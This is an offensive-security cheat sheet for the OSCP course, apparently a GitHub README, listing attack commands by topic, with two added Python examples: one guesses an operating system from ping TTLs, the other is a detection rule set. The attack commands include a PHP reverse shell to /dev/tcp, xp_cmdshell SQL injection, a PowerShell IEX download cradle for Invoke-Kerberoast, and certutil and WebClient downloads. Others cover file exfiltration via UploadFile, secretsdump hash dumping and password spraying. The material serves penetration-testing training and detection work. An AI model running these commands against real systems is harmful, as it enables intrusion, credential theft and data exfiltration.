JustTryHarder
JustTryHarder is a cheat sheet which will aid you through the PWK course & the OSCP Exam.
(Inspired by PayloadAllTheThings)
Feel free to submit a Pull Request & leave a star to share some love if this helped you. 💖
Hacktoberfest friendly! Yes, we are open to Pull Requests for Hacktoberfest! Please ensure it is not spam and actually contributes well to this repo. Thanks & happy hacking!
Disclaimer: None of the below includes spoilers for the PWK labs / OSCP Exam.
Credit Info
I have obtained a lot of this info through other GitHub repos, blogs, sites and more. I have tried to give as much credit to the original creator as possible. If I have not given you credit, please contact me on Twitter: https://twitter.com/s1nfulz
Table of Contents
- Determining the OS of a host via Ping
- BOF (WIP)
- Breakouts / Environment Escapes
- DNS - Zone Transfers
- File Transfers
- Kerberoasting
- LFI / RFI
- MSSQL / SQLi
- Password Cracking
- Password Spraying (CrackMapExec)
- Payload Generation
- PHP
- Priv Esc - Linux
- Priv Esc - Windows
- Post Exploitation
- Port Forwarding
- Socks Proxy (using PowerShell)
- Port Scanning
- Ping Sweep
- Pivoting
- Remote Desktop
- Responder
- Reverse Shells
- Shell Upgrading
- SQL Injection (SQLmap)
- Show listening ports
- SMB - Enumeration
- SMB - Impacket
- SMTP Enumeration
- ICMP Injection
- VMware (not going full screen)
- Web Servers
- Web Scanning
- Web Shells
- WordPress
- Windows Framework / Powershell
- Windows Post Exploitation Commands
- Writeable Directories
- Todo List
- Thank you
Determining the OS of a host via Ping
ping 10.10.10.110
PING 10.10.10.110 (10.10.10.110) 56(84) bytes of data.
64 bytes from 10.10.10.110: icmp_seq=1 ttl=128 time=166 ms
The reply TTL hints at the OS of the host: each OS starts from a default initial TTL, and every router on the return path decrements it by one, so the difference from the nearest default is the hop count. The three common defaults are:
- TTL=64 = *nix. A reply with TTL 61 came 3 hops from a *nix device, most likely Linux.
- TTL=128 = Windows. A reply with TTL 127 came 1 hop from a Windows box.
- TTL=254 = Solaris/AIX. A reply with TTL 250 came 4 hops from a Solaris box.
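The hop-count arithmetic above, as an added example that is not part of the original cheat sheet: a small Python helper that pulls the TTL out of a ping reply line (Linux `ttl=` or Windows `TTL=` format), picks the smallest common default TTL at or above it, and reports the OS family and hop count. The sample reply lines and the 64/128/254 table are taken from the section above; the replies themselves are constructed, not captured traffic.

```python
import re

# Typical initial TTL values from the cheat sheet, keyed to OS family. Heuristics
# only: the default is an OS setting and can be changed by an administrator.
INITIAL_TTLS = {64: "*nix (most likely Linux)", 128: "Windows", 254: "Solaris/AIX"}

# Matches the TTL field in both Linux ("ttl=128") and Windows ("TTL=128") replies.
TTL_FIELD = re.compile(r"\bttl=(\d+)", re.IGNORECASE)

# Constructed sample replies (not captured from a real network).
SAMPLE_REPLIES = [
    "64 bytes from 10.10.10.110: icmp_seq=1 ttl=128 time=166 ms",  # Windows target, on-link
    "64 bytes from 10.10.10.111: icmp_seq=1 ttl=61 time=12.3 ms",  # *nix target, 3 hops away
    "Reply from 10.10.10.112: bytes=32 time=1ms TTL=250",          # Windows-style ping, Solaris/AIX, 4 hops
    "Request timed out.",                                          # no TTL at all
]


def guess_os(observed_ttl):
    """Return (os_family, hop_count) for a reply TTL, or (None, None) if unknown.

    The reply carries initial_ttl - hops, so take the smallest common initial
    TTL that is >= the observed value; the remainder is the hop count.
    """
    for initial in sorted(INITIAL_TTLS):
        if observed_ttl <= initial:
            return INITIAL_TTLS[initial], initial - observed_ttl
    return None, None  # e.g. 255: typical of routers and appliances, not in the table


def classify_reply(line):
    """Extract the TTL from one ping reply line and classify it; None if no TTL present."""
    match = TTL_FIELD.search(line)
    if not match:
        return None
    ttl = int(match.group(1))
    os_family, hops = guess_os(ttl)
    return {"ttl": ttl, "os": os_family, "hops": hops}


if __name__ == "__main__":
    for reply in SAMPLE_REPLIES:
        print(f"{reply!r:64} -> {classify_reply(reply)}")
```

The same arithmetic explains why a perimeter firewall that normalises outgoing TTLs to one fixed value removes this signal: every host behind it then looks the same.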
BOF (WIP)
(Typical bad characters include: 0x00, 0x0A, 0x0D)
- Fuzzing
- Finding EIP position
- Finding bad chars
- Locating jmp esp
- Generating payload with msfvenom
- Getting reverse shell with netcat
Good BOF resources:
- NCC Group - Writing Exploits for Win32
- Corelan - Exploit Writing Tutorial Part 1
- GitHub - dostackbufferoverflowgood
- VeteranSec - 32-bit Windows Buffer Overflows Made Easy
Breakouts / Environment Escapes
- Pentest Partners - Breaking out of Citrix
- SRA.io - SiteKiosk Breakout
- TrustedSec - Kiosk/POS Breakout Keys
- Cognosec - Breaking out of Citrix Environment
- NetSPI - Breaking out of Applications
- NCC Group - Common Issues with Environment Breakouts (PDF)
- GracefulSecurity - Citrix Breakout
DNS - Zone Transfers
host -t axfr HTB.local 10.10.10.10
host -l HTB.local 10.10.10.10
host -l <domain name> <name server>
dig @<dns server> <domain> axfr
File Transfers
SMB Transfer
On the victim machine (Windows), map the share hosted on the attacking machine and copy the file to it:
net use x: \\10.10.10.10\myshare
copy whatever.zip x:\
Wget Transfer
How to retrieve file(s) from your host (inside a reverse shell).
Setup: place the file you want to transfer in /var/www/html/ and run service apache2 start.
Run on the remote server:
wget http://10.10.10.10/pspy64 # <- for a single file
wget -r http://10.10.10.10/pspy64/ # <- for a folder
TFTP Transfer
(How to transfer from Kali to Windows.)
Using MSF (start msfconsole before these steps):
use auxiliary/server/tftp
set TFTPROOT /usr/share/mimikatz/Win32
run
Then, in a terminal on the Windows host:
tftp -i 10.10.10.10 GET mimikatz.exe
NetCat (Windows to Kali)
- Windows (sender):
nc -nv 10.11.0.61 4444 < bank-account.zip
- Linux (listener, start this first):
nc -nlvp 4444 > bank-account.zip
PowerShell
Interactive session:
Invoke-WebRequest -Uri http://127.0.0.1/exploit.py -OutFile C:\Users\Victim\exploit.py
Without an interactive PowerShell session (create wget.ps1 with the following content):
$url = "http://<attacker-ip>/file.txt"  # placeholder: the file you are serving
$path = "C:\path\to\save\file.txt"
$client = New-Object System.Net.WebClient
$client.DownloadFile($url, $path)
Base64 (Linux -> Linux)
Local Host:
cat /path/to/exploit.py | base64 > encoded.b64
Transfer encoded.b64 to the remote server via nc or otherwise.
Remote Server - Linux:
cat /path/to/encoded.b64 | base64 -d > exploit.py
Certutil
certutil.exe -urlcache -split -f "http://ip.for.kali.box/file-to-get.zip" name-to-save-as.zip
HTTP File Upload (Exfiltration)
1. Create upload.php
Create in attacking machine webroot (/var/www/html by default).
<?php
// Minimal receiver for the attacking machine only: the client-supplied filename
// is used as-is, which is never acceptable on a server that others can reach.
$uploaddir = '/var/www/uploads/';
$uploadfile = $uploaddir . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile);
?>
2. Create the upload directory and give the web server user write access to it:
sudo mkdir /var/www/uploads && sudo chown www-data:www-data /var/www/uploads
3. Upload the file from the victim machine to the attacking machine using PowerShell:
powershell.exe -exec unrestricted -noprofile -Command "(New-Object System.Net.WebClient).UploadFile('http://10.10.10.10/upload.php', 'file-to-upload.txt')"
Kerberoasting
GetUserSPNs.py -request -dc-ip <DC_IP> <domain\user>
powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat
impacket-secretsdump -just-dc-ntlm <DOMAIN>/<USER>@<DOMAIN_CONTROLLER> -outputfile filename.hashes
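The File Transfers and Kerberoasting sections above lean on the same handful of living-off-the-land primitives: certutil -urlcache, the PowerShell WebClient DownloadFile/UploadFile calls, Invoke-WebRequest -OutFile, the IEX DownloadString cradle, and the -Exec Bypass / -exec unrestricted flags. As an added example that is not part of the original cheat sheet, here is the detection side: a set of command-line rules run over constructed process-creation events (Sysmon Event ID 1 style, reduced to image and command line) modelled on exactly those commands. Every rule requires all of its patterns to match, so benign certutil -hashfile and plain PowerShell use stay quiet. The rule names, severities and sample events are my own constructions, not anything from the project.

```python
import re

# Constructed process-creation events (image, command line). Modelled on the
# commands in the File Transfers and Kerberoasting sections; not real telemetry.
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\certutil.exe",
     "certutil.exe -urlcache -split -f http://10.10.10.10/file-to-get.zip name-to-save-as.zip"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -exec unrestricted -noprofile -Command \"(New-Object System.Net.WebClient)"
     ".UploadFile('http://10.10.10.10/upload.php', 'file-to-upload.txt')\""),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient)"
     ".DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/"
     "data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-Kerberoast"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell.exe -Command Invoke-WebRequest -Uri http://127.0.0.1/exploit.py -OutFile C:\Users\Victim\exploit.py"),
    (r"C:\Windows\System32\certutil.exe",
     r"certutil.exe -hashfile C:\Windows\notepad.exe SHA256"),  # legitimate certutil use
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -Command Get-Process"),                    # legitimate PowerShell use
]

# (rule name, severity, patterns). A rule fires only when every pattern matches
# the command line, case-insensitively.
RULES = [
    ("certutil_urlcache_download", "high",
     [r"\bcertutil(\.exe)?\b", r"-urlcache\b", r"-f\b"]),
    ("powershell_iex_download_cradle", "high",
     [r"\bpowershell(\.exe)?\b", r"\b(IEX|Invoke-Expression)\b", r"\.DownloadString\("]),
    ("powershell_webclient_upload", "high",
     [r"\bpowershell(\.exe)?\b", r"Net\.WebClient", r"\.UploadFile\("]),
    ("powershell_webclient_download", "medium",
     [r"\bpowershell(\.exe)?\b", r"Net\.WebClient", r"\.DownloadFile\("]),
    ("powershell_iwr_outfile", "medium",
     [r"\bpowershell(\.exe)?\b", r"\b(Invoke-WebRequest|iwr)\b", r"-OutFile\b"]),
    ("powershell_policy_bypass_flags", "low",
     [r"\bpowershell(\.exe)?\b", r"-(Exec|ExecutionPolicy|ep)\s+(Bypass|Unrestricted)\b"]),
]


def matching_rules(command_line):
    """Return sorted (name, severity) pairs for every rule whose patterns all match."""
    hits = []
    for name, severity, patterns in RULES:
        if all(re.search(p, command_line, re.IGNORECASE) for p in patterns):
            hits.append((name, severity))
    return sorted(hits)


def scan(events):
    """Run every rule over every event; one finding per (event, rule) pair."""
    findings = []
    for image, cmd in events:
        for name, severity in matching_rules(cmd):
            findings.append({"image": image, "rule": name,
                             "severity": severity, "command_line": cmd})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f['severity']:6}] {f['rule']:32} {f['command_line'][:70]}")
```

Command-line matching is the cheapest signal and the easiest to evade (encoded commands, renamed binaries), so in practice these rules sit alongside PowerShell script block logging (Event ID 4104), where the decoded cradle appears regardless of how it was launched.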
LFI / RFI
PHP Reverse Shell:
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10/1234 0>&1'"); ?>
Command Injection:
<?php echo shell_exec('whoami'); ?>
MSSQL / SQLi
EXEC master..xp_cmdshell 'whoami';
' exec master..xp_cmdshell 'whoami' --
- OSCP-2 SQL Injection Cheatsheet
- PentestMonkey SQL Injection
Password Cracking
Hashcat
hashcat -m 500 -a 0 -o cracked_password.txt --force hash.txt /path/to/your/wordlist.txt
John The Ripper
john --rules --wordlist=/path/to/your/wordlist.txt hash.txt
Password Spraying (CrackMapExec)
cme smb 10.10.10.10 -u username -d domain -p password
Payload Generation
Types:
- Non-staged: netcat
- Staged: multi/handler
PHP
Priv Esc - Linux
Note: if GCC and wget are installed on the target, a kernel exploit becomes practical (it can be fetched and compiled locally), so check the kernel version against the resources below.
- Linux Kernel Exploits
- GTFObins - Break out of restricted shells
- GTFO Helper script: https://github.com/dreadnaughtsec/gtfo
- Linux Exploit Suggester
- Linux Exploit Suggester 2